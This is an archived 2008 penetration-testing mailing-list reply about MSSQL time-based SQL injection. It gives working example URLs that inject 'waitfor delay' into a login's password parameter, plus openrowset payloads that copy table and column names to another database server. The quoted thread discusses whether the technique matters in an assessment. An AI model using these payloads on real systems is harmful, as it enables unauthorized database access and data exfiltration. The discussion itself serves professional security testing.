Penetration Testing mailing list archives
Re: SQL Injection - Waitfor delay
From: "Anthony Cicalla" <anthony.cicalla () gmail com>
Date: Thu, 16 Oct 2008 13:44:12 -0700
wait for delay examples http://www.domain.com/index.asp?Login=&pass=4;waitfor%20delay%20'0:0:15'-- http://www.domain.com/index.asp?Login=&pass=4;waitfor%20delay%20'0:0:25'-- http://www.domain.com/index.asp?Login=&pass=4;waitfor%20delay%20'0:0:35'-- openrowset to other mssql database. http://www.domain.com/index.asp?Login=&pass=4;insert%20into%20openrowset('sqloledb','server=localpubip;uid=auditor;pwd=pass','select%20*%20from%20sysobjectsremote')%20select%20id,name%20from%20sysobjects%20where%20xtype%20='U'-- http://www.domain.com/index.asp?Login=&pass=4;insert%20into%20openrowset('sqloledb','server=localpubip;uid=auditor;pwd=pass','select%20*%20from%20syscolumnsremote')%20select%20id,name%20from%20syscolumns%20where%20xtype%20='U'-- On Wed, Oct 15, 2008 at 7:33 PM, p1g <killfactory () gmail com> wrote:
x, Check out the DefCon site. There was a session that covered some these techniques. On Mon, Oct 13, 2008 at 9:42 AM, xelerated <xelerated () gmail com> wrote:Hi all, I am trying to find more information about a SQL Injection using "waitfor delay". So far, no one that I have asked in the pen test and security field feels its a vulnerability, but my client does think its a big deal but there really is very little information that I can find on it. I hear rumors that using the waitfor delay can help enumerate a database, but again, I'm not sure about that. Id like to pull on the vast knowledge of this list to see if that counts in a test as a SQL Inject, and if its a big deal if you can use it. Thanks! Chris ------------------------------------------------------------------------ This list is sponsored by: Cenzic Security Trends Report from Cenzic Stay Ahead of the Hacker Curve! Get the latest Q2 2008 Trends Report now www.cenzic.com/landing/trends-report -------------------------------------------------------------------------- -p1g SnortCP, ESSE-D, C|HFI, TNCP, TECP, NACP, A+, whatever.. ,,__ o" )~ oink oink ' ' ' ' If you spend more on coffee than on IT security, you will be hacked. What's more, you deserve to be hacked. -- former White House cybersecurity czar Richard Clarke ------------------------------------------------------------------------ This list is sponsored by: Cenzic Security Trends Report from Cenzic Stay Ahead of the Hacker Curve! Get the latest Q2 2008 Trends Report now www.cenzic.com/landing/trends-report ------------------------------------------------------------------------
-- Anthony, ------------------------------------------------------------------------ This list is sponsored by: Cenzic Security Trends Report from Cenzic Stay Ahead of the Hacker Curve! Get the latest Q2 2008 Trends Report now www.cenzic.com/landing/trends-report ------------------------------------------------------------------------
Current thread:
- SQL Injection - Waitfor delay xelerated (Oct 13)
- Re: SQL Injection - Waitfor delay rajat swarup (Oct 13)
- Re: SQL Injection - Waitfor delay Krugger (Oct 14)
- Re: SQL Injection - Waitfor delay p1g (Oct 16)
- Re: SQL Injection - Waitfor delay Anthony Cicalla (Oct 16)
- Re: SQL Injection - Waitfor delay Haroon Meer (Oct 16)
- Re: SQL Injection - Waitfor delay xelerated (Oct 16)
- Re: SQL Injection - Waitfor delay Robin Wood (Oct 16)
- <Possible follow-ups>
- Re: SQL Injection - Waitfor delay Parity (Oct 14)
- Re: SQL Injection - Waitfor delay Anthony Cicalla (Oct 15)